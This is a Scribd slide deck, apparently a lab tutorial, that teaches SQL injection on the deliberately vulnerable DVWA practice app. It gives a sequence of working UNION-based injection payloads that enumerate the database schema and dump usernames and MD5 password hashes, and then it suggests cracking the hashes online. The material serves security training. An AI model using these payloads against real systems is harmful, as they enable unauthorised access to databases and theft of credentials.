Scribd
Upload
2 views

SQL Injection

Uploaded by

rron53223
Copyright
© © All Rights Reserved
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
2 views

SQL Injection

Uploaded by

rron53223
Copyright
© © All Rights Reserved
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 12

SQL Injection

DVWA

• The name explains a lot, DVWA stands for-


Damn Vulnerable Web Application.
• It is like a playground to test your skills to find
web app vulnerabilities.
What we are upto

In this lab we will do the following:


• We use inject always true SQL statements into the SQL
Injection User ID field with security set to low.
• We will obtain the username and raw-MD5 password
contents from the users table.
• We will use Online decrypters to crack the raw-MD5
password HASH for each user.
Getting Started with DVWA

• Open C:/XAMPP
• Paste this DVWA folder inside the htdocs
folder of xampp.
Coding Execution

Basic Injection
• Input "1" into the text box.
• Click Submit.
• Always true scenario
• Input into the User ID Textbox (See Picture).
– %' or '0'='0
• Click Submit
• Display the Database version
• Input into the User ID Textbox (See Picture).
– %' or 0=0 union select null, version() #
• Click Submit
• Display the Database User
• Input the below text into the User ID Textbox (See
Picture).
– %' or 0=0 union select null, user() #

• Display the Database Name


• Input the below text into the User ID Textbox (See
Picture).
– %' or 0=0 union select null, database() #
Tables in Database

• The INFORMATION_SCHEMA is the information


database, the place that stores information about all
the other databases that the MySQL server
maintains.
• Display information_schema
• Input the below text into the User ID Textbox (See
Picture).
– %' and 1=0 union select null, table_name from
information_schema.tables #
• Click Submit
• Display all the user tables in
information_schema
• Input the below text into the User ID Textbox (See
Picture).
– %' and 1=0 union select null, table_name from
information_schema.tables where table_name like 'user%'#
• Click Submit
• Display all the columns fields in the
information_schema user table
• Input the below text into the User ID Textbox (See
Picture).
– %' and 1=0 union select null,
concat(table_name,0x0a,column_name) from
information_schema.columns where table_name = 'users' #
• Click Submit
• Display all the columns field contents in the
information_schema user table
• Input the below text into the User ID Textbox (See
Picture).
– %' and 1=0 union select null,
concat(first_name,0x0a,last_name,0x0a,user,0x0a,password)
from users #
• Click Submit
• Now the passwords alongwith their user name
is visible
MD5 Decrypting

• Use the online tools to crack the hash


passwords.

You might also like